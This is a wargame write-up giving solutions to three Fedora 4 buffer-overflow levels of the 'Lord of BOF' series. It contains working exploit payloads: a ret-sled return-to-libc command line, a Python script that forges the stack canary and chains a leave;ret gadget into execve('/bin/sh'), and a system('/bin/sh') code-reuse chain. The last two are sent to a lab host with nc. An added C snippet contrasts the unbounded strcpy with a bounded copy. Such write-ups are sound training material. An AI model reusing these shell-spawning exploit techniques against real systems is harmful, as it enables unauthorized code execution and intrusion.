
[Lord Of Bof] Lord Of BOF Solutions ( Fedora 4 )

Solutions

Level 1


- up-upgraded simple buffer overflow 

; no more fake ebp ; random library
; like the FC3 level 1 problem, use ret-to-ret to escape the randomized stack
; with 12 rets, execve's second argument (argv) lands on a NULL
; ret address : 0x08048451
; execve address : 0x00832abc
; for file name : 85 c0 75 53 65 a1 54
; payload : ln -s ./shell $(echo -en "\x85\xc0\x75\x53\x65\xa1\x54")
                 ./cruel $(python -c 'print "A"*260 + "\x51\x84\x04\x08"*12  + "\xbc\x2a\x83\x00"')
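As an added illustration (not part of the original write-up) of the bug class behind level 1: the unbounded copy of the command-line argument that the 260-byte padding overruns, beside a bounded copy that rejects oversized input instead of overwriting the frame. The buffer size and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size for illustration: the level 1 payload pads 260 bytes before
   its return-address sled, so the real frame is about this big. */
#define BUF_SIZE 256

/* The bug class behind level 1: the command-line argument is copied into a
   fixed stack buffer with no length check, so bytes past BUF_SIZE run over
   the saved ebp and the return address. Kept only for contrast. */
static void vulnerable_copy(const char *src)
{
    char buf[BUF_SIZE];
    strcpy(buf, src);
    printf("%s\n", buf);
}

/* Hardened form: the copy is bounded by the destination size and oversized
   input is rejected rather than silently truncated. Returns the number of
   bytes copied, or -1 when src plus its NUL terminator does not fit. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    const char *end = memchr(src, '\0', dst_size);
    if (end == NULL)               /* no NUL within dst_size: too long */
        return -1;
    size_t n = (size_t)(end - src);
    memcpy(dst, src, n + 1);       /* n bytes plus the terminator */
    return (int)n;
}

/* Drop-in replacement for vulnerable_copy: 0 if accepted, 1 if rejected. */
int safe_copy(const char *src)
{
    char buf[BUF_SIZE];
    if (bounded_copy(buf, sizeof buf, src) < 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    printf("%s\n", buf);
    return 0;
}

int main(void)
{
    char overlong[261];            /* constructed: "A"*260, as in the payload */
    memset(overlong, 'A', 260);
    overlong[260] = '\0';
    vulnerable_copy("hello");      /* harmless only because the input is short */
    return safe_copy(overlong);    /* prints the rejection and exits 1 */
}
```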

Level 2


- canary + remote exploit + no NULL bytes accepted + buffer cleared + stdin

; stdin's address changes every run, but only within 0xb7f00000 ~ 0xb7fff000 ; so we may need to brute-force it, if it comes to that
; if you need to use shellcode in the stdin buffer, mprotect is needed ; but I don't want to make my payload long ~
; 
; canary value : 0x31337; 
; execve address : 0x00832abc
; stdin address : 0xb7f
; leaveret address : 0x0804858e

; payload : while [ 1 ]; do (python ./exploit.py ; cat) | nc 192.168.254.131 7777; done

# Python 2 (note the print statement). All addresses come from the notes above;
# the stdin base is a guess inside 0xb7f00000 ~ 0xb7fff000, so the while loop
# in the payload line keeps retrying until it is right.
from struct import *

p = lambda x : pack('<I', x)   # 4-byte little-endian

canary = 0x31337               # canary value checked by the binary
stdin = 0xb7fc9000             # guessed stdin buffer address
execve = 0x00832abc
leaveret = 0x0804858e          # leave ; ret gadget

payload = "A"*260              # fill the stack buffer
payload += p(stdin+0x110)
payload += p(leaveret)
payload += p(canary)
payload += p(stdin+0x10c)
payload += p(execve)
payload += "A"*4
payload += p(stdin+0x128)
payload += p(stdin+0x130)
payload += p(0x00)
payload += "/bin/sh\x00"
payload += p(stdin+0x130)
payload += p(0x00)

print payload                  # written to stdout and piped into nc

Level 3


- Remote exploit + smaller buffer than before + stdin + can't use the buffer + RTL is prevented at ret

; static function ftn() ; 48 bytes to 40 bytes -> buffer overflow
; we can control only 4 bytes ; ftn ~ ftn+3
; This time a code-reuse attack is what I use ; simply put, using
; 
; system address :  0x007db0e7
; /bin/sh address : 0x008bd987
; add esp address : 0x0804854a
   
; payload : (python -c 'print "A"*40 + ("\x4a\x85\x04\x08" + "A"*3)*4 + ("A"*8 + "\xe7\xb0\x7d\x00" + "\x84\x08\x7d\x00" + "\x87\xd9\x8b\x00")'; cat) | nc 192.168.254.131 8888

ALL CLEAR!


[titan@Fedora_2ndFloor ~]$ ls
dropped_item.txt
[titan@Fedora_2ndFloor ~]$ cat ./*
                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,' 
                   `'
[titan@Fedora_2ndFloor ~]$